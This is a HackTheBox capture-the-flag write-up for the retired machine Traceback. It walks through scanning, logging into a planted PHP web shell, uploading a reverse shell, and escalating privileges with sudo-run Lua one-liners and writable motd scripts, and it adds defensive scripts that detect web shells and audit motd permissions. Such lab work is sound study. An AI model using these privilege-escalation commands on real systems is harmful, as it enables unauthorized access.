This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Machine IP: 10.10.10.181
I kick things off with a port scan.
sudo nmap -sS -T4 -p- 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 00:35 EDT
Nmap scan report for 10.10.10.181
Host is up (0.019s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

sudo nmap -sT -T4 -p22,80 -A -sC -sV 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 00:36 EDT
Nmap scan report for 10.10.10.181
Host is up (0.015s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
All right, a web server.
gobuster doesn't turn up anything with the usual wordlists.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -u http://10.10.10.181/ -x txt,php
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 30 -u http://10.10.10.181 -x txt,php
http://10.10.10.181/ brings up a page with the following message:
This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
The source of the page includes the comment:
<!--Some of the best web shells that you might need ;)-->
Searching the internet for Xh4H brings up this tweet:
Pretty interesting collection of webshells: https://t.co/gRllNN08zt
— Xh4H (@RiftWhiteHat) March 10, 2020
That brings me to https://github.com/TheBinitGhimire/Web-Shells.
I compile a wordlist of web shell endpoints and run them through
This time I get a hit!
gobuster dir -w webshells.txt -u http://10.10.10.181
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       webshells.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/09 00:53:10 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/06/09 00:53:10 Finished
===============================================================
Navigating to that URL brings up a web shell login page.
Looking at the web shell source, I see the credentials are admin / admin. This logs me in.
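A drop-in shell like smevk.php is easy to find from the defender's side because it does the one thing a web shell must do: read a command from request input and hand it to a PHP execution function. The helper below is an added example (not code from the writeup or from the Web-Shells repository); it flags PHP files under a web root that contain both an execution call and a superglobal read, and assumes GNU grep.

```shell
#!/bin/sh
# Hypothetical detection helper (added example, not from the writeup).
# A file is reported only when it BOTH calls a command-execution function
# AND reads request input ($_GET/$_POST/$_REQUEST/$_COOKIE), which cuts
# out most legitimate code that merely shells out with fixed arguments.
# Assumes GNU grep (for -r, --include and \b). Usage: find_php_shells <webroot>
find_php_shells() {
    root="$1"
    execs='\b(system|exec|shell_exec|passthru|popen|proc_open|eval)[[:space:]]*\('
    input='\$_(GET|POST|REQUEST|COOKIE)\['
    list=$(mktemp)
    # Candidate files: anything PHP-like that calls an execution function
    grep -rlE --include='*.php' --include='*.phtml' "$execs" "$root" 2>/dev/null | sort > "$list"
    n=0
    while IFS= read -r f; do
        # Skip candidates that never touch request input
        grep -qE "$input" "$f" || continue
        funcs=$(grep -oE "$execs" "$f" | sed 's/[[:space:]]*($//' | sort -u | tr '\n' ' ')
        printf '%s: %s\n' "$f" "$funcs"
        n=$((n + 1))
    done < "$list"
    rm -f "$list"
    # Exit status is the number of suspicious files, so 0 means nothing found
    return "$n"
}
```

Run it against the document root of a server you administer; a hit whose modification time does not line up with a deployment, as with the file dropped on this box, is worth a closer look.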
I can run commands through the web shell, but I cannot trigger netcat.
I opt for some information gathering before creating a full reverse shell through this web shell.
I am running as the
There is another user on the system as well,
In webadmin's directory, I find a note:
A tool somewhere that lets me invoke Lua, huh?
I check webadmin's bash history and find the location of the script:
/home/sysadmin/luvit it is.
And it looks like webadmin has permission to run the script:
GTFOBins has some suggestions on how to use Lua for my purposes. I can read the user flag with:
sudo -u sysadmin /home/sysadmin/luvit -e 'local f=io.open("/home/sysadmin/user.txt", "rb"); print(f:read("*a")); io.close(f);'
Now for the reverse shell.
Instead of figuring out a Lua one-liner, I opt to upload a PHP reverse shell (like /usr/share/webshells/php/php-reverse-shell.php, which is included on Kali) to the web server using the smevk web shell.
This gives me a webadmin user shell.
With a TTY shell, I can escalate my privileges to sysadmin by running:
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash -i")'
I check to see what files sysadmin can access on the server:
find / -type f -user sysadmin 2>/dev/null | grep -v '/proc/'
/home/sysadmin/.bashrc
/home/sysadmin/luvit
/home/sysadmin/.bash_logout
/home/sysadmin/.ssh/authorized_keys
/home/sysadmin/.cache/motd.legal-displayed
/home/sysadmin/.bash_history
/home/sysadmin/user.txt
/home/sysadmin/.profile
/home/webadmin/note.txt
/home/sysadmin/.cache/motd.legal-displayed is unusual, but otherwise not interesting.
I also run LinEnum, which highlights an interesting process that seems related to this file.
It appears that every 30 seconds,
root updates the
motd handles the banner messages when you ssh onto a system.
Since I am sysadmin, I can go to /home/sysadmin/.ssh/authorized_keys and add my public key.
SSHing onto the system, I see the following banner message:
I see this message comes from the
sysadmin has write access to these files.
sysadmin@[hostname]:/etc/update-motd.d$ ls -l
total 24
-rwxrwxr-x 1 root sysadmin  981 Jun  8 23:17 00-header
-rwxrwxr-x 1 root sysadmin  982 Jun  8 23:17 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Jun  8 23:17 50-motd-news
-rwxrwxr-x 1 root sysadmin  604 Jun  8 23:17 80-esm
-rwxrwxr-x 1 root sysadmin  299 Jun  8 23:17 91-release-upgrade
I should be able to get a reverse shell by modifying this 00-header file, but I couldn't get the syntax correct.
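The root path here is a permissions bug, not a clever exploit: pam_motd runs every script in /etc/update-motd.d as root at SSH login, so a script that the sysadmin group can write is a root-level execution primitive for that group. The check below is an added example (not code from the writeup); it lists scripts in such a directory that are not owned by the expected user or carry group/world write bits, and assumes GNU coreutils stat.

```shell
#!/bin/sh
# Hypothetical audit helper (added example, not from the writeup).
# Reports scripts in an update-motd.d-style directory that a non-root
# principal could modify: wrong owner, group-writable, or world-writable.
# On this box 'ls -l' showed -rwxrwxr-x root:sysadmin, which this flags.
# Assumes GNU coreutils stat. Usage: audit_motd_scripts [dir] [expected_owner]
audit_motd_scripts() {
    dir="${1:-/etc/update-motd.d}"
    want="${2:-root}"
    bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        owner=$(stat -c '%U' "$f")
        # Keep the last three octal digits of the mode: owner, group, other
        perm=$(printf '%04d' "$(stat -c '%a' "$f")" | tail -c 3)
        grp=$(printf '%s' "$perm" | cut -c2)
        oth=$(printf '%s' "$perm" | cut -c3)
        reason=""
        [ "$owner" = "$want" ] || reason="owned by $owner"
        # Bit 2 of an octal permission digit is the write bit
        [ $((grp & 2)) -eq 0 ] || reason="${reason:+$reason, }group-writable"
        [ $((oth & 2)) -eq 0 ] || reason="${reason:+$reason, }world-writable"
        if [ -n "$reason" ]; then
            echo "WEAK: $f (mode $perm, $reason)"
            bad=$((bad + 1))
        fi
    done
    # Exit status is the number of weak scripts, so 0 means the directory is clean
    return "$bad"
}
```

The fix on a real host is the default layout: scripts owned by root with mode 755, so only root can change what root executes at login.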
The official Traceback write-up has a payload, it seems.
Instead, I opted to read the root flag.
When I next SSH onto the system, I am presented with the root flag. Remember that root flags are ephemeral these days, so this root flag is no longer valid and attempting to use it may get your HTB account flagged.